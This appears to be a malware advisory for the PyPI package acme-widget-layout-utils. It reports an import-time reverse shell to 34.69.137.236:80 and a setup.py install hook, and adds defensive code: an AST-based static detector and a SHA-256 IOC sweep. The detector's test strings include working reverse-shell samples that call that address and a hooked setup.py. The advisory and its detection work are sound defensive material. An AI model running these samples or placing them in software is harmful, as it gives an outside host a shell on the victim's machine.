Malicious package

acme-widget-layout-utils (PyPI)

Malicious code in acme-widget-layout-utils (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-5545
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach. If the package has already been imported on a host, treat that host as compromised: uninstalling removes the files but does not close a shell session that is already established.
pip uninstall acme-widget-layout-utils

What this malware does

On first import, src/acme_widget_layout_utils/__init__.py (lines 13-17) opens a TCP socket to 34.69.137.236:80, duplicates stdin/stdout/stderr onto the socket via os.dup2, and execs /bin/sh -i: a textbook interactive reverse shell that hands whoever controls 34.69.137.236 a shell on the importing host, with the privileges of the process that did the import. The behavior is unconditional and fires the moment any consumer runs import acme_widget_layout_utils.

setup.py additionally installs a custom install command that writes /tmp/pypi_install_hook_marker.txt at install time, corroborating the package's role as a deliberately crafted attack artifact.

The package name suggests benign UI/layout utilities and contains no such functionality. The pyproject.toml description openly self-identifies as a 'pentest C2 target', but the package is published on public PyPI under a generic name where any developer searching for widget/layout helpers can incidentally install it and be backdoored. The README's 'authorized pentest' framing does not change installer-side impact.
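As an added example (written for this page; it is not O3 Security's detection logic and not code from the package), the import-time reverse-shell pattern described above can be caught statically before a package is ever imported: parse the module with Python's ast, look for a socket connect, an os.dup2 redirection and a shell exec, and resolve whether they run at module level or inside a helper that module-level code calls. The sample sources below are constructed to mirror the advisory's description (the C2 address is the one named above; the strings are parsed, never executed); the exec-name prefixes, shell basenames and the one-hop helper resolution are the editor's heuristics, not an exhaustive list.

```python
# Added example (editor's, not O3 Security's or the package's code): a static
# detector for the import-time reverse-shell pattern the advisory describes.
import ast

SHELL_BASENAMES = {"sh", "bash", "dash", "zsh"}                       # editor's heuristic list
EXEC_PREFIXES = ("os.exec", "os.spawn", "os.system", "os.popen", "subprocess.", "pty.spawn")


def _call_name(node):
    """Best-effort dotted name of a call target: os.dup2, s.connect, socket.socket().connect."""
    if isinstance(node, ast.Call):
        return _call_name(node.func) + "()"
    if isinstance(node, ast.Attribute):
        return _call_name(node.value) + "." + node.attr
    if isinstance(node, ast.Name):
        return node.id
    return "?"


def _strings(node):
    """Every string constant nested anywhere under an expression."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def _classify(call):
    """Map one Call node to a signal kind, or None."""
    name = _call_name(call.func)
    if name.endswith((".connect", ".connect_ex", "create_connection")):
        return "socket_connect"   # sqlite3.connect etc. also match; shell_exec is required below
    if name == "os.dup2":
        return "dup2"
    if name.startswith(EXEC_PREFIXES) and any(
            s.rsplit("/", 1)[-1] in SHELL_BASENAMES for s in _strings(call)):
        return "shell_exec"
    return None


def _endpoint(call):
    """(host, port) if the connect target is a literal tuple, else None."""
    for n in ast.walk(call):
        if isinstance(n, ast.Tuple) and len(n.elts) == 2 and all(
                isinstance(e, ast.Constant) for e in n.elts):
            host, port = n.elts[0].value, n.elts[1].value
            if isinstance(host, str) and isinstance(port, int):
                return (host, port)
    return None


def analyze_module(source):
    """Return which signals fire on plain `import` and the literal C2 endpoint, if any."""
    signals, toplevel_calls, c2 = {}, set(), None

    def visit(node, scope):        # scope: None = module level, else enclosing function name
        nonlocal c2
        for child in ast.iter_child_nodes(node):
            if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef)):
                visit(child, child.name)        # body runs only when called
                continue
            if isinstance(child, ast.Lambda):
                visit(child, "<lambda>")
                continue
            if isinstance(child, ast.Call):
                kind = _classify(child)
                if kind:
                    signals.setdefault(scope, set()).add(kind)
                    if kind == "socket_connect" and c2 is None:
                        c2 = _endpoint(child)
                if scope is None and isinstance(child.func, ast.Name):
                    toplevel_calls.add(child.func.id)   # helper invoked at import time
            visit(child, scope)    # class bodies, if/try/with blocks all execute on import

    visit(ast.parse(source), None)
    import_time = set(signals.get(None, ()))
    for fn in toplevel_calls:      # one hop: def _boot(): ...; _boot()
        import_time |= signals.get(fn, set())
    return {
        "import_time_signals": sorted(import_time),
        "reverse_shell_on_import": {"socket_connect", "shell_exec"} <= import_time,
        "c2": c2,
    }


def install_hook_in_setup(source):
    """True if setup.py routes installation through a custom cmdclass (code runs at pip install time)."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.keyword) and node.arg == "cmdclass" and isinstance(node.value, ast.Dict):
            keys = {k.value for k in node.value.keys if isinstance(k, ast.Constant)}
            if keys & {"install", "develop", "build_py", "egg_info"}:
                return True
    return False


# Constructed sample mirroring the behaviour the advisory attributes to __init__.py.
MALICIOUS_INIT = '''
import os, socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("34.69.137.236", 80))
os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2)
os.execv("/bin/sh", ["/bin/sh", "-i"])
'''
# Constructed variant hiding the same logic in a helper that is called at import.
WRAPPED_INIT = '''
import socket, subprocess
def _boot():
    c = socket.create_connection(("34.69.137.236", 80))
    subprocess.call(["sh", "-i"], stdin=c.fileno(), stdout=c.fileno(), stderr=c.fileno())
_boot()
'''
# Constructed benign module: a connect inside a function nobody calls at import.
BENIGN = '''
import socket
def fetch(host):
    return socket.create_connection((host, 443))
'''
# Constructed setup.py with the install-time hook the advisory describes.
HOOKED_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
class Hook(install):
    def run(self):
        open("/tmp/pypi_install_hook_marker.txt", "w").write("hooked")
        install.run(self)
setup(name="acme-widget-layout-utils", version="0.0.3", cmdclass={"install": Hook})
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_INIT), ("wrapped", WRAPPED_INIT), ("benign", BENIGN)):
        print(label, analyze_module(src))
    print("setup.py install hook:", install_hook_in_setup(HOOKED_SETUP))
```

Run it over an unpacked sdist or wheel (every .py file plus setup.py) before installing, not after: the whole point of the advisory is that the payload runs on import, so a dynamic check that imports the module is itself the trigger. The socket_connect rule is deliberately loose and will also flag database connects; a hit only counts when a shell exec is reachable from module-level code as well.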

Malicious versions

1 flagged
0.0.3

Indicators of compromise (SHA-256)

42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600
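Added example (the editor's, not O3 Security tooling): an offline sweep that hashes files under a set of directories and reports any whose SHA-256 matches the IOC above, plus a check for the install-time marker file named in the description. The default roots (this interpreter's site-packages, pip's cache at ~/.cache/pip, ~/Downloads) are assumptions about where a downloaded sdist or wheel would typically sit; the demo plants a constructed file in a temporary directory rather than touching real paths.

```python
# Added example (editor's, not O3 Security tooling): hash-based IOC sweep.
import hashlib
import os
import sysconfig
import tempfile

# SHA-256 IOC published in this advisory (the flagged 0.0.3 artifact).
ADVISORY_IOCS = {"42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600"}
# Marker written by the package's custom install command, per the advisory.
MARKER_PATH = "/tmp/pypi_install_hook_marker.txt"


def sha256_file(path, chunk=1 << 20):
    """Streaming SHA-256 hex digest of a file (safe for large caches)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(roots, iocs):
    """Return [(path, digest)] for regular files under roots whose SHA-256 is in iocs."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):     # followlinks=False by default
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue        # skip symlinks so a planted link cannot redirect the sweep
                try:
                    digest = sha256_file(path)
                except OSError:
                    continue        # unreadable file: log it in real tooling, skip here
                if digest in iocs:
                    hits.append((path, digest))
    return hits


def default_roots():
    """Assumed locations where a downloaded sdist/wheel or installed copy would sit."""
    candidates = [
        sysconfig.get_paths()["purelib"],             # site-packages of this interpreter
        os.path.expanduser("~/.cache/pip"),            # pip's default cache on Linux (assumption)
        os.path.expanduser("~/Downloads"),
    ]
    return [p for p in candidates if os.path.isdir(p)]


def marker_present(path=MARKER_PATH):
    """True if the install-time hook's marker file exists on this host."""
    return os.path.exists(path)


def demo_sweep():
    """Constructed demo: plant a stand-in file in a temp dir and confirm the sweep finds exactly it."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "acme_widget_layout_utils-0.0.3.tar.gz")
        with open(target, "wb") as f:
            f.write(b"constructed stand-in for the flagged sdist, not the real artifact\n")
        empty = os.path.join(tmp, "empty.bin")
        open(empty, "wb").close()
        digest = sha256_file(target)
        hits = sweep([tmp], ADVISORY_IOCS | {digest})
        return {
            "hits": hits,
            "found_exactly_target": hits == [(target, digest)],
            "advisory_hash_seen": any(d in ADVISORY_IOCS for _, d in hits),
            "empty_file_digest": sha256_file(empty),
        }


if __name__ == "__main__":
    print("marker present:", marker_present())
    for path, digest in sweep(default_roots(), ADVISORY_IOCS):
        print("IOC MATCH", digest, path)
    print("demo found planted file:", demo_sweep()["found_exactly_target"])
```

A hash match confirms the flagged artifact is present; its absence proves little, since a rebuilt or re-uploaded copy hashes differently. Treat the marker file and any outbound connection to 34.69.137.236:80 as the stronger host-side evidence.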

Frequently asked questions

Is acme-widget-layout-utils safe to use?

No. acme-widget-layout-utils on PyPI has been identified as a malicious package (version 0.0.3 flagged). It should be removed immediately; do not install it or keep it in your dependency tree.

Campaign

IN-MAL-2026-005357

Credits

  • Amazon Inspector · finder

acme-widget-layout-utils (PyPI) malicious package — MAL-2026-5545 | O3 Security